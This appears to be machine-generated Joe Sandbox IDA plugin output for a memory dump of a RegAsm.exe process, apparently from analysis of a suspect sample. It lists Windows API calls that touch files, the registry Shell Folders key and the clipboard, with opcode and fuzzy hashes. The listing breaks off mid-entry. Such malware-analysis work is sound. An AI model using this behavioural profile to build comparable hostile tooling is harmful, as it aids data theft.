                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileModuleName
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 514040917-0
                                                                                                                                                                      • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                                      • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                                                                                                      • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                                      • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                                                                                                      APIs
                                                                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileRead
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                                      • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                                      • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                                                                                                      • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                                      • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                                                                                                      APIs
                                                                                                                                                                      • WriteFile.KERNEL32(?,00000009,?,00000000,00000000), ref: 0040A325
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileWrite
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3934441357-0
                                                                                                                                                                      • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                                      • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                                                                                                      • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                                      • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                                                                                                      APIs
                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3664257935-0
                                                                                                                                                                      • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                                                                      • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                                                                                                      • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                                                                      • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                                      • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                                      • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                                                                                                      • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                                      • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                                      • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                                      • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                                                                                                      • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                                      • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                                                                                                      APIs
                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ??3@
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 613200358-0
                                                                                                                                                                      • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                                      • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                                                                                                      • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                                      • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                                                                                                      APIs
                                                                                                                                                                      • FreeLibrary.KERNEL32(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3664257935-0
                                                                                                                                                                      • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                                      • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                                                                                                      • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                                      • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                                                                                                      APIs
                                                                                                                                                                      • EnumResourceNamesW.KERNEL32(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: EnumNamesResource
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3334572018-0
                                                                                                                                                                      • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                                      • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                                                                                                      • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                                      • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3664257935-0
                                                                                                                                                                      • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                                      • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                                                                                                      • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                                      • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                                                                                                      APIs
                                                                                                                                                                      • FindClose.KERNEL32(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseFind
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1863332320-0
                                                                                                                                                                      • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                                      • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                                                                                                      • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                                      • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                                                                                                      APIs
                                                                                                                                                                      • RegOpenKeyExW.KERNEL32(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Open
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 71445658-0
                                                                                                                                                                      • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                                                      • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                                                                                                                                      • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                                                      • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                      • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                                      • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                                                                                                      • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                                      • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                                                                                                                      • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                                                                                                      • Opcode Fuzzy Hash: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                                                                                                                      • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                                                                                                      APIs
                                                                                                                                                                      • memset.MSVCRT ref: 004095FC
                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                        • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                                                                                                        • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                                                        • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3655998216-0
                                                                                                                                                                      • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                                                                      • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                                                                                                      • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                                                                      • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                                                                                                      APIs
                                                                                                                                                                      • memset.MSVCRT ref: 00445426
                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                        • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                        • Part of subcall function 0040B6EF: CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1828521557-0
                                                                                                                                                                      • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                                                                      • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                                                                                                      • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                                                                      • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                        • Part of subcall function 004062A6: SetFilePointerEx.KERNEL32(0040627C,?,?,00000000,00000000), ref: 004062C2
                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ??2@FilePointermemcpy
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 609303285-0
                                                                                                                                                                      • Opcode ID: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                                                                                                                      • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                                                                                                                                      • Opcode Fuzzy Hash: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                                                                                                                      • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _wcsicmp
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2081463915-0
                                                                                                                                                                      • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                                                                                                      • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                                                                                                      • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                                                                                                      • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF), ref: 0040629C
                                                                                                                                                                        • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                      • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                                                                                        • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2136311172-0
                                                                                                                                                                      • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                                      • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                                                                                                      • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                                      • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ??2@??3@
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1936579350-0
                                                                                                                                                                      • Opcode ID: c1d2223be94a68f833538aabce888aab0279aa93460cd9bacb51074fa57d6133
                                                                                                                                                                      • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                                                                                                                      • Opcode Fuzzy Hash: c1d2223be94a68f833538aabce888aab0279aa93460cd9bacb51074fa57d6133
                                                                                                                                                                      • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: free
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1294909896-0
                                                                                                                                                                      • Opcode ID: 6cac8f1a699deb91221d7a6f108e22352180a1071cf07404188a59dfc78ebdbf
                                                                                                                                                                      • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                                                                                                                      • Opcode Fuzzy Hash: 6cac8f1a699deb91221d7a6f108e22352180a1071cf07404188a59dfc78ebdbf
                                                                                                                                                                      • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: free
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1294909896-0
                                                                                                                                                                      • Opcode ID: 9f3c014d0cf6ef3ef7071a5cb6dd1d5584685ccd4eb021183226fc9c7d12a071
                                                                                                                                                                      • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                                                                                                      • Opcode Fuzzy Hash: 9f3c014d0cf6ef3ef7071a5cb6dd1d5584685ccd4eb021183226fc9c7d12a071
                                                                                                                                                                      • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                                                                                                                      APIs
                                                                                                                                                                      • EmptyClipboard.USER32 ref: 004098EC
                                                                                                                                                                        • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                                                                                      • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                                                                                                      • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                                                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0040995D
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00409974
                                                                                                                                                                      • CloseClipboard.USER32 ref: 0040997D
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3604893535-0
                                                                                                                                                                      • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                                                                                      • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                                                                                                                                      • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                                                                                      • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                                                                                                                                      APIs
                                                                                                                                                                      • EmptyClipboard.USER32 ref: 00409882
